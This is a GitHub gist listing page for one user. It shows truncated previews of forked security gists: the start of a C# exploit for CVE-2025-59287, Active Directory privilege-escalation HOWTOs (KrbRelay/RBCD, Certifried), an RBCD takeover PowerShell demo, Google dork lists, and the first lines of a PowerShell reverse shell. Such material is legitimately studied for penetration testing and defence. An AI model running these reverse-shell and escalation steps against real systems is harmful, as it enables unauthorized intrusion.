I hereby claim:
- I am k3nundrum on github.
- I am k3nundrum (https://keybase.io/k3nundrum) on keybase.
- I have a public key ASA5SkVPbuqnCcS22F0iyJLxxLEaau8S-LUxoeLGllavOwo
To claim this, I am signing this object:
k3nundrum k3nundrum
k3nundrum
/ gist:12bde8342423230b5370f51162383446
Created
November 20, 2025 03:23
— forked from hawktrace/gist:880b54fb9c07ddb028baaae401bd3951
CVE-2025-59287
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Security.Cryptography; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| namespace hawktracewsus | |
| { | |
| class Program | |
| { | |
| static void Main() |
k3nundrum
/ ntlmdecoder.py
Created
November 15, 2025 23:03
— forked from aseering/ntlmdecoder.py
NTLM auth-string decoder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
| ## Reads the raw blob from stdin; prints out the contained metadata. | |
| ## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
| ## Based on the excellent protocol description from: | |
| ## <http://davenport.sourceforge.net/ntlm.html> | |
| ## with additional detail subsequently added from the official protocol spec: | |
| ## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
| ## |
k3nundrum
/ keybase.md
Created
October 1, 2024 14:58
k3nundrum
/ krbrelay_privesc_howto.md
Created
July 4, 2023 21:35
— forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
k3nundrum
/ certifried_with_krbrelayup.md
Created
May 17, 2022 14:55
— forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
k3nundrum
/ google-dorks
Created
August 3, 2021 06:17
— forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
k3nundrum
/ rbcd_demo.ps1
Created
July 28, 2021 06:55
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
k3nundrum
/ dorks.txt
Created
July 2, 2020 20:29
— forked from abdelhady360/dorks.txt
List of Google Dorks for sites that have responsible disclosure program / bug bounty program
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| inurl /bug bounty | |
| inurl : / security | |
| inurl:security.txt | |
| inurl:security "reward" | |
| inurl : /responsible disclosure | |
| inurl : /responsible-disclosure/ reward | |
| inurl : / responsible-disclosure/ swag | |
| inurl : / responsible-disclosure/ bounty | |
| inurl:'/responsible disclosure' hoodie | |
| responsible disclosure swag r=h:com |
k3nundrum
/ mini-reverse.ps1
Created
June 28, 2020 12:41
— forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |